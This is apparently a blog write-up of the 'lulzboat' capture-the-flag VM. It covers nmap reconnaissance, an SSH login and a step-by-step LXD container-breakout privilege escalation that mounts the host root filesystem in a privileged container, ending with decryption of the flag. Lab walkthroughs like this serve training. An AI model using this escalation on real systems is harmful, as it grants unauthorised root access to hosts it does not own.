Introduction
In between client projects, marketing, sales and looking after the lab I try and keep my technical skills sharp. One way I do this is to practise in the lab and on CTF arenas. I was cruising twitter for threat intel and keeping in touch with the community and saw @ZachBarker1338 had submitted a VM to hack the box. Unfortunately, for a number of reasons it didn’t meet the HTB review criteria, but that didn’t stop the VM getting published in another manner. @ZachBarker1338 collaborated with Secjuice (https://www.secjuice.com/) to release the lulzboat CTF challenge VM.
Steps
- Download the virtual machine (you will need Oracle Virtualbox installed)- https://www.secjuice.com/lulzboat-ctf-by-lulzseczombie/
- Configure networking (I had to use private host networking to gain access to the VM, you may get access on a DHCP net, but I tried a few different DHCP enabled segments with no joy)
- Load up a kali instance (I setup a Kali VM in virtualbox with dual NICS to provide internet access)
- Enumerate and hack your way in
- Use your lulzsec knowledge (or Wikipedia) to decipher the clues to finaly reveal the flags
Breakdown (spoilers ahead)
Phase 1 Recon
Nmap the host:
Nmap -F -T5 -Pn 192.168.56.103
We can see here that TCP 80 and 22 are open
Phase 2 – Action on target (usermode)
Now we have the password we now need to log into the VM over SSH. As you can see from the text, we don’t know the username. In traditional hack the box style the username is the creator of the virtual machine – in this case, lulzseczombie.
A quick ssh [email protected] gives us a user mode shell:
So now we confirm usermode, we grab the user.txt flag!
A shrubbery…. Lulzsec… that can only mean the user flag is “Topriary” (https://www.merriam-webster.com/dictionary/topiary)
Next, it’s time to start hunting for a privilege escalation route.
In this instance it’s possible to locate the privilege escalation route just by running the id command:
However, that’s retrospective. I personally found the route (this wasn’t actually the planned priv esc route, there’s a kernel vulnerability as well that can be exploited!) by uploading linenum.sh and executing:
LXD looks interesting as it’s a Linux container solution which just screamed out as container breakout!
Next steps were to download the alpine image onto the KALI VM
git clone https://github.com/saghul/lxd-alpine-builder.git
cd alpine
./build-alpine
scp alpine-v3.7-x86_64-20180621_0444.tar.gz [email protected]
#ssh to the lulzboat VM
mkdir lulz
mv alpine-v3.7-x86_64-20180621_0444.tar.gz lulz
cd lulz
lxc import alpine-v3.7-x86_64-20180621_0444.tar.gz –alias lulz
#list the image
lxc image list
#use privileged mode
lxc init lulz ignite -c security.privileged=true
#mount the host filesystem
lxc config device add ignite mydevice disk path=/mnt/root source=/ recursive=true
#execute a shell on the container
lxc exec ignite /bin/sh
#Navigate to the mounted root path and cat the flag
Finally, we can see the flag is DES encrypted. The clue here is the lulzsec motto…
So, we head over to a web based DES decryption tool to start trying to decrypt (yes this wasn’t a first hit IRL, I went all over the houses first generating a wordlist etc.)
So, there we have it! From zero to hero with some simple enumeration and a bit of a history test thrown in. I really enjoyed this challenge, the lulzsec theme was fun and the route to pwn this box was at a reasonable level. Well done to @Cephurs and @knoself for getting first blood and second place!
If you are interested in expanding your skills, capture the flag competitions are a great way to hone your skills, there are some great platforms out there such as:
- Hack the Box (https://www.hackthebox.eu/)
- Immersive labs (https://www.immersivelabs.co.uk/)
- OCSP Labs (https://www.offensive-security.com/offensive-security-solutions/virtual-penetration-testing-labs/)
Thanks to @ZachBarker1338 for taking the time to put this together and @secjuice for publishing!